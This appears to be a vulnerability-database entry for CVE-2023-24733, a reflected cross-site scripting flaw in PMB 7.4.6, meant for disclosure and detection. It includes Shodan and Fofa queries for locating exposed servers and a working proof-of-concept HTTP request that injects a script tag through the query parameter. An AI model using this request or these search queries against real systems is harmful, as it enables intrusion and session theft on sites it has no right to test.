🔙 목록으로 돌아가기

CVE-2023-24733: PMB 7.4.6 - Cross-Site Scripting

TitlePMB 7.4.6 - Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
RemediationApply the latest security patch or upgrade to a non-vulnerable version of PMB.
CVSS Score6.1
EPSS Score0.11698
CVE IDCVE-2023-24733
CWE IDCWE-79
Shodan Queryhttp.favicon.hash:1469328760http.html:"pmb group"
Fofa Querybody="pmb group"icon_hash=1469328760
Tags cve cve2023 unauth xss pmb pmb_project sigb vkev vuln

🔍 Vulnerability Description

PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

🌐 HTTP Request

GET /pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-24733.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-24733.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A